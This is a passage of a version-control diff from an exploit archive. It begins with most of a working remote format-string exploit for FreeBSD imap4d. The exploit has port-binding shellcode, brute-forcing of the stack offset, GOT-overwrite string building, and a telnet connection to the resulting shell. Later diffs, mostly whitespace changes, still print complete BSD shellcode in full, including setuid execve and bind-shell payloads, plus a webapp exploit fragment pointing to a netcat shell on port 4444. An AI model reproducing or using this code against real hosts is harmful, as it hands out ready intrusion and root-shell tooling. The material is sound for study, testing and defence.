+char code[] =
+"\x90\x90\x90\x90"
+"\x90\x90\x90\x90"
+"\x90\x90\x90\x90"
+"\x31\xc0" /* xor %eax,%eax */
+"\x31\xc0" /* xor %eax,%eax */
+"\x50" /* push %eax */
+"\x31\xc0" /* xor %eax,%eax */
+"\x50" /* push %eax */
+"\xb0\x7e" /* mov $0x7e,%al */
+"\x50" /* push %eax */
+"\xcd\x80" /* int $0x80 */
+"\x31\xc0" /* xor %eax,%eax */
+
+/* fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) */
+"\x31\xc0" // xorl %eax,%eax
+"\x31\xdb" // xorl %ebx,%ebx
+"\x31\xc9" // xorl %ecx,%ecx
+"\x31\xd2" // xorl %edx,%edx
+"\xb0\x61" // movb $0x61,%al
+"\x51" // pushl %ecx
+"\xb1\x06" // movb $0x6,%cl
+"\x51" // pushl %ecx
+"\xb1\x01" // movb $0x1,%cl
+"\x51" // pushl %ecx
+"\xb1\x02" // movb $0x2,%cl
+"\x51" // pushl %ecx
+"\x8d\x0c\x24" // leal (%esp),%ecx
+"\x51" // pushl %ecx
+"\xcd\x80"
// int $0x80 + +/* it binds on port 30464 */ +/* bind(fd, (struct sockaddr*)&sin, sizeof(sin)) */ +"\xb1\x02" // movb $0x2,%cl +"\x31\xc9" // xorl %ecx,%ecx +"\x51" // pushl %ecx +"\x51" // pushl %ecx +"\x51" // pushl %ecx + +/* port = 0x77, change if needed */ +"\x80\xc1\x77" // addb $0x77,%cl +"\x66\x51" // pushw %cx +"\xb5\x02" // movb $0x2,%ch +"\x66\x51" // pushw %cx +"\x8d\x0c\x24" // leal (%esp),%ecx +"\xb2\x10" // movb $0x10,%dl +"\x52" // pushl %edx +"\x51" // pushl %ecx +"\x50" // pushl %eax +"\x8d\x0c\x24" // leal (%esp),%ecx +"\x51" // pushl %ecx +"\x89\xc2" // movl %eax,%edx +"\x31\xc0" // xorl %eax,%eax +"\xb0\x68" // movb $0x68,%al +"\xcd\x80" // int $0x80 + +/* listen(fd, 1)*/ +"\xb3\x01" // movb $0x1,%bl +"\x53" // pushl %ebx +"\x52" // pushl %edx +"\x8d\x0c\x24" // leal (%esp),%ecx +"\x51" // pushl %ecx +"\x31\xc0" // xorl %eax,%eax +"\xb0\x6a" // movb $0x6a,%al +"\xcd\x80" // int $0x80 + +/* cli = accept(fd, 0,0) */ +"\x31\xc0" // xorl %eax,%eax +"\x50" // pushl %eax +"\x50" // pushl %eax +"\x52" // pushl %edx +"\x8d\x0c\x24" // leal (%esp),%ecx +"\x51" // pushl %ecx +"\x31\xc9" // xorl %ecx,%ecx +"\xb0\x1e" // movb $0x1e,%al +"\xcd\x80" // int $0x80 + +/* dup2(cli,0) */ +"\x89\xc3" // movl %eax,%ebx +"\x53" // pushl %ebx +"\x51" // pushl %ecx +"\x31\xc0" // xorl %eax,%eax +"\xb0\x5a" // movb $0x5a,%al +"\xcd\x80" // int $0x80 + +/* dup2(cli, 1) */ +"\x41" // inc %ecx +"\x53" // pushl %ebx +"\x51" // pushl %ecx +"\x31\xc0" // xorl %eax,%eax +"\xb0\x5a" // movb $0x5a,%al +"\xcd\x80" // int $0x80 + +/* dup2(cli, 2) */ +"\x41" // inc %ecx +"\x53" // pushl %ebx +"\x51" // pushl %ecx +"\x31\xc0" // xorl %eax,%eax +"\xb0\x5a" // movb $0x5a,%al +"\xcd\x80" // int $0x80 + +/* execve("//bin/sh", ["//bin/sh", NULL], NULL) */ +"\x31\xdb" // xorl %ebx,%ebx +"\x53" // pushl %ebx +"\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e +"\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f +"\x89\xe3" // movl %esp,%ebx +"\x31\xc0" // xorl %eax,%eax +"\x50" // pushl %eax +"\x54" // 
pushl %esp +"\x53" // pushl %ebx +"\x50" // pushl %eax +"\xb0\x3b" // mov $0x3b,%al +"\xcd\x80" // int $0x80 + +/* exit(..) */ +"\x31\xc0" // xorl %eax,%eax +"\xb0\x01" // mobv $0x1,%al +"\xcd\x80"; // int $0x80 + + + +void usage( int argc, char **argv ) +{ + + fprintf(stdout, "%s usage:\n\n", argv[0]); + fprintf(stdout, "\t-h host\n"); + fprintf(stdout, "\t-p port\n"); + fprintf(stdout, "\t-l login\n"); + fprintf(stdout, "\t-a password\n\n"); + + return; +} + + +void send_message( int fd, char *msg, ... ) +{ + char string[2000]; + int len; + size_t size; + + va_list args; + + + clean(string); + + + va_start(args, msg); + len = vsnprintf(string, sizeof(string)-1, msg,args); + len = (len >=0) ? len : 0; + + /* Terminating the string */ + string[len]='\0'; + + write(fd, string, len); + + return; +} + + + + + +char *buildstring( long r_addr, long target, int offset, int sock ) +{ + unsigned char string[512], a[4]; + int len; + int high, low, arw; + + + + high = ( target & 0xffff0000 ) >> 16; + low = ( target & 0x0000ffff ); + + clean(a); + a[0] = (r_addr >> 24) & 0xff; + a[1] = (r_addr >> 16) & 0xff; + a[2] = (r_addr >> 8) & 0xff; + a[3] = (r_addr) & 0xff; + a[4] = '\0'; + + clean(string); + len = sprintf(string, "3 search topic .%c%c%c%c%%.%dx%%%d$hn\n", + (int)a[3]+2,a[2],a[1],a[0], + high -(0x24+13), /* Number of bytes for the first write */ + offset /* The Offset to addr */ + ); + + len = (len >=0) ? len : 0; + string[len] = '\0'; + write(sock, string, len); + + read(sock, string, sizeof(string)); + + + clean(string); + len = sprintf(string, "3 search topic .%c%c%c%c%%.%dx%%%d$hn%s\n", + (int) a[3], (int)a[2], (int)a[1],(int)a[0], + low - (0x24 +13), + offset, /* The offset to addr +2 */ + code + ); + + len = (len >=0) ? 
len : 0; + string[len] = '\0'; + write(sock, string, len); + + + return (char *)strdup(string); +} + + +void get_addr_as_char( u_int addr, char *buf ) +{ + *(u_int*)buf = addr; + if (!buf[0]) buf[0]++; + if (!buf[1]) buf[1]++; + if (!buf[2]) buf[2]++; + if (!buf[3]) buf[3]++; +} + +static int got_entry = 0x08057a0c+4; + + +int comun( char *host, struct sockaddr_in sin4 ) +{ + char *a[4] = { "/usr/bin/telnet", host , "30464", NULL }; + execve(a[0],a, NULL); + return 0; +} + +void welcome( ) +{ + fprintf( stdout, "\nCopyright (c) 2005 Rosiello Security\n" ); + fprintf( stdout, "http://www.rosiello.org\n" ); + fprintf( stdout, "imap4d Format String Exploiter for FreeBSD\n\n" ); +} + +int main( int argc, char **argv ) +{ + struct hostent *hp; + struct sockaddr_in sin4; + char shellbuf[1030]; + char *host, buffer[512], *ptr, *p, *USER, *PASS; + int ch, port = 0, sock, offset = 1; + int login = 0, i, calc = 0; + int ret = 0, len = 0, b; + int have_shell_loc = 0; + unsigned int shell_addr = (u_int)0x0806c000; + + welcome( ); + + if ( argc < 9 ) + { + usage(argc, argv); + exit(EXIT_SUCCESS); + } + + if (!(host = malloc (128))) + { + fprintf(stderr, "exp.c:115 Could not allocate memory\n"); + exit(EXIT_FAILURE); + } + + + while((ch = getopt(argc, argv, "h:p:l:a:")) != EOF) + { + switch(ch) + { + case 'h': + host = (char *)strdup(optarg); + break; + + case 'V': + break; + + case 'p': + port = atoi (optarg); + break; + + case 'l': + USER = (char *)optarg; + break; + + case 'a': + PASS = (char *)optarg; + break; + + default: + usage(argc, argv); + break; + } +} + + + + if ((sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) + { + fprintf(stderr, "exp.c:139 Error creating an new socket"); + exit(EXIT_FAILURE); + } + + host = (host) ? host : "localhost"; + port = (port) ? 
port : 143; + + if (!(ISIP(host))) + { + if (!(hp = gethostbyname(host))) + { + fprintf(stderr, "exp.c:152 Could not resolve ip address\n"); + exit(EXIT_FAILURE); + } + + memcpy(&sin4.sin_addr,hp->h_addr,hp->h_length); + host = (char *)strdup(inet_ntoa(sin4.sin_addr)); + } else + sin4.sin_addr.s_addr = inet_addr(host); + + + + + sin4.sin_family = AF_INET; + sin4.sin_port = (unsigned short)htons( port ); + + fprintf(stdout, "[+] Connecting to %s:%d\n", host,port); + + if ((connect(sock, (struct sockaddr *)&sin4,sizeof(struct sockaddr))) < 0) + { + fprintf(stderr, "[*] exp.c:178 Connection failed\n"); + exit(EXIT_FAILURE); + } + + + fprintf(stdout, "[+] Connected .. \n"); + fprintf(stdout, "[+] Sending login ... \n"); + + send_message(sock, "1 LOGIN %s %s\r\n", USER, PASS); + fprintf(stdout, "[+] Done ... \n"); + + while ((read(sock, buffer, 512)) > 0) + { + if ( login == 0 && ret == 0) + switch (buffer[0]) + { + + case '1': + fprintf(stdout, "[+] Selecting inbox ..\n"); + send_message(sock, "2 Select inbox\n"); + fprintf(stdout, "[+] Selecting Done .. 
Starting brute sequence\n"); + send_message(sock, "3 search topic .AAAABBBB%%%d$x\n",offset); + login = 1; + break; + } + + + if ((ptr=strstr(buffer, "(near")) && login == 1) + { + ptr +=15; + if ((strncmp(ptr, "41414141",8))!=0) + { + offset ++; + send_message(sock, "3 search topic .AAAABBBB%%%d$x\n",offset); + } + else + { + fprintf(stdout, "[+] Found offset %d\n", offset); + fprintf(stdout, "[+] Finding buffer on the stack\n"); + ret = 1; + login = 0; + clean(buffer); + } + } + + if ( ret == 1 ) + { + + if ((ptr=strstr(buffer, "(near"))) + { + ptr +=6+4 +1; /* +4 for the addr string*/ + /* +1 for the junk char */ + calc = strlen(buffer) - strlen(ptr); + calc -=6+4+1; + + for (i = 0; i < strlen(buffer); i++) + { + if ( (strncmp(ptr, code, strlen(code)))==0 && have_shell_loc !=1) + { + shell_addr += i -4; + have_shell_loc = 1; + sleep(2); + buildstring(got_entry, shell_addr+=3, offset, sock); + fprintf(stdout,"[+] Decoy found at %p\n", shell_addr); + close(sock); + fprintf(stdout, "[+] Trying to contact the bind shell ..\n"); + if((comun(host, sin4)) < 0) + fprintf(stderr, "[-] Exploit failed\n"); + } + else + ++ptr; + } + } + if( shell_addr > 0xc0000000) + break; + shell_addr++; + ptr = ((char *)&shell_addr); + ptr[4] = 0; + if ( strchr(ptr, 0xa) || strchr(ptr, 0xd) || ptr[0]==0x00) + { + shell_addr ++; + ptr = ((char *)&shell_addr); + ptr[4] = 0; + } + while (strlen(ptr) !=4) + { + shell_addr++; + ptr = ((char *)&shell_addr); + ptr[4] = 0; + } + if (have_shell_loc != 1) + { + send_message(sock, "3 search topic .%s....%%%d$s%sCCCC\n",ptr,offset,code); + } + } + clean(buffer); + } + + fprintf(stderr, "[+] Closing connection\n"); + close(sock); + free(host); + + fprintf(stderr, "[-] Exploit failed %p\n", shell_addr); + return 0; +} + +// milw0rm.com [2005-09-26] diff --git a/platforms/bsd/remote/228.c b/platforms/bsd/remote/228.c index 61f6c9ded..eda7bca20 100755 --- a/platforms/bsd/remote/228.c +++ b/platforms/bsd/remote/228.c 
@@ -242,6 +242,6 @@ while (1)
 }
 }
 }
-
-
-// milw0rm.com [2000-12-15]
+
+
+// milw0rm.com [2000-12-15]
diff --git a/platforms/bsd/remote/234.c b/platforms/bsd/remote/234.c
index 6430cac73..4bed46335 100755
--- a/platforms/bsd/remote/234.c
+++ b/platforms/bsd/remote/234.c
@@ -496,6 +496,6 @@ xrecieve(int fd, char *buf, int size)
 perror("read"); /* XXX */
 exit(-1);
 }
-
-
-// milw0rm.com [2000-12-20]
+
+
+// milw0rm.com [2000-12-20]
diff --git a/platforms/bsd/remote/409.c b/platforms/bsd/remote/409.c
index 458a9db64..6a12d29f4 100755
--- a/platforms/bsd/remote/409.c
+++ b/platforms/bsd/remote/409.c
@@ -872,6 +872,6 @@ x86_nop (unsigned char *dest, unsigned int dest_len, } return (walk); -} - -// milw0rm.com [2001-06-09] +} + +// milw0rm.com [2001-06-09]
diff --git a/platforms/bsd/remote/432.c b/platforms/bsd/remote/432.c
index 4c3662855..eb8944f61 100755
--- a/platforms/bsd/remote/432.c
+++ b/platforms/bsd/remote/432.c
@@ -416,6 +416,6 @@ main (int argc, char **argv) { printf("[*] Checking for shell..\n"); root(host); -} - -// milw0rm.com [2004-09-02] +} + +// milw0rm.com [2004-09-02]
diff --git a/platforms/bsd/shellcode/13242.txt b/platforms/bsd/shellcode/13242.txt
index 1e7b04cc5..b272bccab 100755
--- a/platforms/bsd/shellcode/13242.txt
+++ b/platforms/bsd/shellcode/13242.txt
@@ -142,6 +142,6 @@ void main() { (*ret) = (int)shellcode; } - - + + # milw0rm.com [2000-11-19]
\ No newline at end of file
diff --git a/platforms/bsd_ppc/shellcode/13243.c b/platforms/bsd_ppc/shellcode/13243.c
index 50770802b..7eea1426b 100755
--- a/platforms/bsd_ppc/shellcode/13243.c
+++ b/platforms/bsd_ppc/shellcode/13243.c
@@ -69,6 +69,6 @@ L2: bl L1 # branch and link back to L1 .Lfe1: .size m,.Lfe1-m -*/ - +*/ + // milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/bsd_x86/shellcode/13244.c b/platforms/bsd_x86/shellcode/13244.c
index d6438fed6..aeaa21cdc 100755
--- a/platforms/bsd_x86/shellcode/13244.c
+++ b/platforms/bsd_x86/shellcode/13244.c
@@ -1,45 +1,45 @@ -/* - * $Id: setuid-bsd.c,v 1.6 2004/06/02 12:22:30 raptor Exp $ - * - * setuid-bsd.c - setuid/execve shellcode for *BSD/x86 - * Copyright (c) 2003 Marco Ivaldi - * - * Short setuid(0) and /bin/sh execve() shellcode (based on esdee's code). - * - * Tested on OpenBSD and FreeBSD. - */ - -/* - * setuid(0) - * - * 20c8: 31 c0 xor %eax,%eax - * 20ca: 50 push %eax - * 20cb: 50 push %eax - * 20cc: b0 17 mov $0x17,%al - * 20ce: cd 80 int $0x80 - * - * execve("/bin/sh", ["/bin/sh"], NULL) - * - * 20d0: 31 c0 xor %eax,%eax - * 20d2: 50 push %eax - * 20d3: 68 2f 2f 73 68 push $0x68732f2f - * 20d8: 68 2f 62 69 6e push $0x6e69622f - * 20dd: 89 e3 mov %esp,%ebx - * 20df: 50 push %eax - * 20e0: 54 push %esp - * 20e1: 53 push %ebx - * 20e2: 50 push %eax - * 20e3: b0 3b mov $0x3b,%al - * 20e5: cd 80 int $0x80 - */ - -char sc[] = /* 7 + 23 = 30 bytes */ -"\x31\xc0\x50\x50\xb0\x17\xcd\x80" -"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80"; - -main() -{ - int (*f)() = (int (*)())sc; f(); -} - +/* + * $Id: setuid-bsd.c,v 1.6 2004/06/02 12:22:30 raptor Exp $ + * + * setuid-bsd.c - setuid/execve shellcode for *BSD/x86 + * Copyright (c) 2003 Marco Ivaldi + * + * Short setuid(0) and /bin/sh execve() shellcode (based on esdee's code). + * + * Tested on OpenBSD and FreeBSD. 
+ */ + +/* + * setuid(0) + * + * 20c8: 31 c0 xor %eax,%eax + * 20ca: 50 push %eax + * 20cb: 50 push %eax + * 20cc: b0 17 mov $0x17,%al + * 20ce: cd 80 int $0x80 + * + * execve("/bin/sh", ["/bin/sh"], NULL) + * + * 20d0: 31 c0 xor %eax,%eax + * 20d2: 50 push %eax + * 20d3: 68 2f 2f 73 68 push $0x68732f2f + * 20d8: 68 2f 62 69 6e push $0x6e69622f + * 20dd: 89 e3 mov %esp,%ebx + * 20df: 50 push %eax + * 20e0: 54 push %esp + * 20e1: 53 push %ebx + * 20e2: 50 push %eax + * 20e3: b0 3b mov $0x3b,%al + * 20e5: cd 80 int $0x80 + */ + +char sc[] = /* 7 + 23 = 30 bytes */ +"\x31\xc0\x50\x50\xb0\x17\xcd\x80" +"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80"; + +main() +{ + int (*f)() = (int (*)())sc; f(); +} + // milw0rm.com [2006-07-20] \ No newline at end of file diff --git a/platforms/bsd_x86/shellcode/13245.c b/platforms/bsd_x86/shellcode/13245.c index 8441d077a..936389626 100755 --- a/platforms/bsd_x86/shellcode/13245.c +++ b/platforms/bsd_x86/shellcode/13245.c 
@@ -1,112 +1,112 @@ -/* - * $Id: portbind-bsd.c,v 1.3 2004/06/02 12:22:30 raptor Exp $ - * - * portbind-bsd.c - setuid/portbind shellcode for *BSD/x86 - * Copyright (c) 2003 Marco Ivaldi - * - * Simple portbind shellcode that bind()'s a setuid(0) shell on - * port 31337/tcp (based on bighawk's code). - * - * Tested on OpenBSD and FreeBSD. - */ - -/* - * setuid(0) - * - * 20c8: 31 c0 xor %eax,%eax - * 20ca: 50 push %eax - * 20cb: 50 push %eax - * 20cc: b0 17 mov $0x17,%al - * 20ce: cd 80 int $0x80 - * - * socket(AF_INET, SOCK_STREAM, 0) - * - * 20d0: 31 c9 xor %ecx,%ecx - * 20d2: f7 e1 mul %ecx,%eax - * 20d4: 51 push %ecx - * 20d5: 41 inc %ecx - * 20d6: 51 push %ecx - * 20d7: 41 inc %ecx - * 20d8: 51 push %ecx - * 20d9: 51 push %ecx - * 20da: b0 61 mov $0x61,%al - * 20dc: cd 80 int $0x80 - * - * bind(s, server, sizeof(server)) - * - * 20de: 89 c3 mov %eax,%ebx - * 20e0: 52 push %edx - * 20e1: 66 68 7a 69 pushw $0x697a - * 20e5: 66 51 push %cx - * 20e7: 89 e6 mov %esp,%esi - * 20e9: b1 10 mov $0x10,%cl - * 20eb: 51 push %ecx - * 20ec: 56 push %esi - * 20ed: 50 push %eax - * 20ee: 50 push %eax - * 20ef: b0 68 mov $0x68,%al - * 20f1: cd 80 int $0x80 - * - * listen(s, 1) - * - * 20f3: 51 push %ecx - * 20f4: 53 push %ebx - * 20f5: 53 push %ebx - * 20f6: b0 6a mov $0x6a,%al - * 20f8: cd 80 int $0x80 - * - * accept(s, 0, 0) - * - * 20fa: 52 push %edx - * 20fb: 52 push %edx - * 20fc: 53 push %ebx - * 20fd: 53 push %ebx - * 20fe: b0 1e mov $0x1e,%al - * 2100: cd 80 int $0x80 - * - * dup2(c, 2) - * dup2(c, 1) - * dup2(c, 0) - * - * 2102: b1 03 mov $0x3,%cl - * 2104: 89 c3 mov %eax,%ebx - * 2106: b0 5a mov $0x5a,%al - * 2108: 49 dec %ecx - * 2109: 51 push %ecx - * 210a: 53 push %ebx - * 210b: 53 push %ebx - * 210c: cd 80 int $0x80 - * 210e: 41 inc %ecx - * 210f: e2 f5 loop 2106 <_sc+0x3e> - * - * execve("/bin/sh", ["/bin/sh"], NULL) - * - * 2111: 51 push %ecx - * 2112: 68 2f 2f 73 68 push $0x68732f2f - * 2117: 68 2f 62 69 6e push $0x6e69622f - * 211c: 89 e3 mov %esp,%ebx - * 
211e: 51 push %ecx - * 211f: 54 push %esp - * 2120: 53 push %ebx - * 2121: 53 push %ebx - * 2122: b0 3b mov $0x3b,%al - * 2124: cd 80 int $0x80 - */ - -char sc[] = /* 8 + 86 = 94 bytes */ -"\x31\xc0\x50\x50\xb0\x17\xcd\x80" -"\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80" -"\x89\xc3\x52\x66\x68" -"\x7a\x69" // port 31337/tcp, change if needed -"\x66\x51\x89\xe6\xb1\x10\x51\x56\x50\x50\xb0\x68\xcd\x80" -"\x51\x53\x53\xb0\x6a\xcd\x80" -"\x52\x52\x53\x53\xb0\x1e\xcd\x80" -"\xb1\x03\x89\xc3\xb0\x5a\x49\x51\x53\x53\xcd\x80" -"\x41\xe2\xf5\x51\x68//sh\x68/bin\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80"; - -main() -{ - int (*f)() = (int (*)())sc; f(); -} - +/* + * $Id: portbind-bsd.c,v 1.3 2004/06/02 12:22:30 raptor Exp $ + * + * portbind-bsd.c - setuid/portbind shellcode for *BSD/x86 + * Copyright (c) 2003 Marco Ivaldi + * + * Simple portbind shellcode that bind()'s a setuid(0) shell on + * port 31337/tcp (based on bighawk's code). + * + * Tested on OpenBSD and FreeBSD. + */ + +/* + * setuid(0) + * + * 20c8: 31 c0 xor %eax,%eax + * 20ca: 50 push %eax + * 20cb: 50 push %eax + * 20cc: b0 17 mov $0x17,%al + * 20ce: cd 80 int $0x80 + * + * socket(AF_INET, SOCK_STREAM, 0) + * + * 20d0: 31 c9 xor %ecx,%ecx + * 20d2: f7 e1 mul %ecx,%eax + * 20d4: 51 push %ecx + * 20d5: 41 inc %ecx + * 20d6: 51 push %ecx + * 20d7: 41 inc %ecx + * 20d8: 51 push %ecx + * 20d9: 51 push %ecx + * 20da: b0 61 mov $0x61,%al + * 20dc: cd 80 int $0x80 + * + * bind(s, server, sizeof(server)) + * + * 20de: 89 c3 mov %eax,%ebx + * 20e0: 52 push %edx + * 20e1: 66 68 7a 69 pushw $0x697a + * 20e5: 66 51 push %cx + * 20e7: 89 e6 mov %esp,%esi + * 20e9: b1 10 mov $0x10,%cl + * 20eb: 51 push %ecx + * 20ec: 56 push %esi + * 20ed: 50 push %eax + * 20ee: 50 push %eax + * 20ef: b0 68 mov $0x68,%al + * 20f1: cd 80 int $0x80 + * + * listen(s, 1) + * + * 20f3: 51 push %ecx + * 20f4: 53 push %ebx + * 20f5: 53 push %ebx + * 20f6: b0 6a mov $0x6a,%al + * 20f8: cd 80 int $0x80 + * + * accept(s, 0, 0) + * + * 20fa: 
52 push %edx + * 20fb: 52 push %edx + * 20fc: 53 push %ebx + * 20fd: 53 push %ebx + * 20fe: b0 1e mov $0x1e,%al + * 2100: cd 80 int $0x80 + * + * dup2(c, 2) + * dup2(c, 1) + * dup2(c, 0) + * + * 2102: b1 03 mov $0x3,%cl + * 2104: 89 c3 mov %eax,%ebx + * 2106: b0 5a mov $0x5a,%al + * 2108: 49 dec %ecx + * 2109: 51 push %ecx + * 210a: 53 push %ebx + * 210b: 53 push %ebx + * 210c: cd 80 int $0x80 + * 210e: 41 inc %ecx + * 210f: e2 f5 loop 2106 <_sc+0x3e> + * + * execve("/bin/sh", ["/bin/sh"], NULL) + * + * 2111: 51 push %ecx + * 2112: 68 2f 2f 73 68 push $0x68732f2f + * 2117: 68 2f 62 69 6e push $0x6e69622f + * 211c: 89 e3 mov %esp,%ebx + * 211e: 51 push %ecx + * 211f: 54 push %esp + * 2120: 53 push %ebx + * 2121: 53 push %ebx + * 2122: b0 3b mov $0x3b,%al + * 2124: cd 80 int $0x80 + */ + +char sc[] = /* 8 + 86 = 94 bytes */ +"\x31\xc0\x50\x50\xb0\x17\xcd\x80" +"\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80" +"\x89\xc3\x52\x66\x68" +"\x7a\x69" // port 31337/tcp, change if needed +"\x66\x51\x89\xe6\xb1\x10\x51\x56\x50\x50\xb0\x68\xcd\x80" +"\x51\x53\x53\xb0\x6a\xcd\x80" +"\x52\x52\x53\x53\xb0\x1e\xcd\x80" +"\xb1\x03\x89\xc3\xb0\x5a\x49\x51\x53\x53\xcd\x80" +"\x41\xe2\xf5\x51\x68//sh\x68/bin\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80"; + +main() +{ + int (*f)() = (int (*)())sc; f(); +} + // milw0rm.com [2006-07-20] \ No newline at end of file diff --git a/platforms/bsd_x86/shellcode/13246.c b/platforms/bsd_x86/shellcode/13246.c index 133553556..cfb59b951 100755 --- a/platforms/bsd_x86/shellcode/13246.c +++ b/platforms/bsd_x86/shellcode/13246.c @@ -40,6 +40,6 @@ execve_sh.s strings: call start .string "/bin/sh" -*********************************************/ - +*********************************************/ + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/bsd_x86/shellcode/13247.c b/platforms/bsd_x86/shellcode/13247.c index 8aad5f615..c0e4fbadd 100755 --- a/platforms/bsd_x86/shellcode/13247.c 
+++ b/platforms/bsd_x86/shellcode/13247.c
@@ -34,6 +34,6 @@ main()
 printf("Shellcode lenght=%d\n",sizeof(shellcode));
 ret=(int*)&ret+2;
 (*ret)=(int)shellcode;
-}
-
+}
+
 // milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/bsd_x86/shellcode/13248.c b/platforms/bsd_x86/shellcode/13248.c
index d0b3091dc..da61cc3a3 100755
--- a/platforms/bsd_x86/shellcode/13248.c
+++ b/platforms/bsd_x86/shellcode/13248.c
@@ -59,6 +59,6 @@ main()
 printf("\nportbinding execve() shellcode (port 31337) bsd/x86 (%db) - no1 (greyhats.za.net)\n",strlen(shellc0de));
 sc();
 return;
-}
-
+}
+
 // milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/bsd_x86/shellcode/13250.c b/platforms/bsd_x86/shellcode/13250.c
index 9e72a832d..9c923c238 100755
--- a/platforms/bsd_x86/shellcode/13250.c
+++ b/platforms/bsd_x86/shellcode/13250.c
@@ -43,6 +43,6 @@ main()
 printf("Shellcode lenght=%d\n",sizeof(shellcode));
 ret=(int*)&ret+2;
 (*ret)=(int)shellcode;
-}
-
+}
+
 // milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/bsd_x86/shellcode/13251.c b/platforms/bsd_x86/shellcode/13251.c
index 64fd09541..2ba374edd 100755
--- a/platforms/bsd_x86/shellcode/13251.c
+++ b/platforms/bsd_x86/shellcode/13251.c
@@ -37,6 +37,6 @@ main(void)
 int *ret;
 ret = (int*)&ret + 2;
 (*ret) = shellcode;
-}
-
+}
+
 // milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/bsd_x86/shellcode/13252.c b/platforms/bsd_x86/shellcode/13252.c
index 895cfb5c2..38d306d85 100755
--- a/platforms/bsd_x86/shellcode/13252.c
+++ b/platforms/bsd_x86/shellcode/13252.c
@@ -24,6 +24,6 @@ main()
 printf("Shellcode lenght=%d\n",sizeof(shellcode));
 ret=(int*)&ret+2;
 (*ret)=(int)shellcode;
-}
-
+}
+
 // milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/bsd_x86/shellcode/13254.c b/platforms/bsd_x86/shellcode/13254.c
index 409a92b92..fee16c617 100755
--- a/platforms/bsd_x86/shellcode/13254.c
+++ b/platforms/bsd_x86/shellcode/13254.c
@@ -67,6 +67,6 @@ main()
 int *ret;
 ret=(int*)&ret+2;
 (*ret)=(int)shellcode;
-}
-
+}
+
 // milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/bsd_x86/shellcode/13255.c b/platforms/bsd_x86/shellcode/13255.c
index 929fa6c03..0e1ebaefa 100755
--- a/platforms/bsd_x86/shellcode/13255.c
+++ b/platforms/bsd_x86/shellcode/13255.c
@@ -42,6 +42,6 @@ main()
 printf("Shellcode lenght=%d\n",sizeof(shellcode));
 ret=(int*)&ret+2;
 (*ret)=(int)shellcode;
-}
-
+}
+
 // milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/bsd_x86/shellcode/13256.c b/platforms/bsd_x86/shellcode/13256.c
index f543753da..813f52c65 100755
--- a/platforms/bsd_x86/shellcode/13256.c
+++ b/platforms/bsd_x86/shellcode/13256.c
@@ -61,6 +61,6 @@ main(int argc, char ** argv) f = (void *) shellcode; f(); -} - +} + // milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/bsdi_x86/shellcode/13257.txt b/platforms/bsdi_x86/shellcode/13257.txt
index 86cdb50e9..dabcca4bb 100755
--- a/platforms/bsdi_x86/shellcode/13257.txt
+++ b/platforms/bsdi_x86/shellcode/13257.txt
@@ -6,6 +6,6 @@ char bsdi_shell[]= "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76" "\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07" - "\xff\xe8\xdc\xff\xff\xff/bin/sh\x00"; - + "\xff\xe8\xdc\xff\xff\xff/bin/sh\x00"; + # milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/bsdi_x86/shellcode/13258.txt b/platforms/bsdi_x86/shellcode/13258.txt
index caa9f6555..17fe5998b 100755
--- a/platforms/bsdi_x86/shellcode/13258.txt
+++ b/platforms/bsdi_x86/shellcode/13258.txt
@@ -7,6 +7,6 @@ static char exec[]=
 "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c" /* 14 characters. */
 "\x89\x76\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff" /* 14 characters. */
 "\xff\xff\xff\x07\xff\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e" /* 14 characters. */
- "\x2f\x73\x68\x00"; /* 4 characters; 46 characters total. */
-
+ "\x2f\x73\x68\x00"; /* 4 characters; 46 characters total. */
+
 # milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/bsdi_x86/shellcode/13260.c b/platforms/bsdi_x86/shellcode/13260.c
index 14e0e1d5e..c0e214dfc 100755
--- a/platforms/bsdi_x86/shellcode/13260.c
+++ b/platforms/bsdi_x86/shellcode/13260.c
@@ -57,6 +57,6 @@ main()
 f = (int (*)()) code;
 printf("BSDi old shellcode, %d bytes\n", strlen(code));
 (int)(*f)();
-}
-
+}
+
 // milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/cgi/webapps/1039.pl b/platforms/cgi/webapps/1039.pl
index 6c48af32e..9bbabc45c 100755
--- a/platforms/cgi/webapps/1039.pl
+++ b/platforms/cgi/webapps/1039.pl
@@ -67,6 +67,6 @@ sleep(100);
 print "\n\n$$$ OK -- Now Try: Nc -v www.Site.com 4444 $$$\n";
 print "$$ if This Port was Close , This mean is That , You Haven't Permission to Write in /TMP $$\n";
 print "Enjoy ;)";
-### EOF ###
-
-# milw0rm.com [2005-06-11]
+### EOF ###
+
+# milw0rm.com [2005-06-11]
diff --git a/platforms/cgi/webapps/1040.c b/platforms/cgi/webapps/1040.c
index 43d475db7..82f730acb 100755
--- a/platforms/cgi/webapps/1040.c
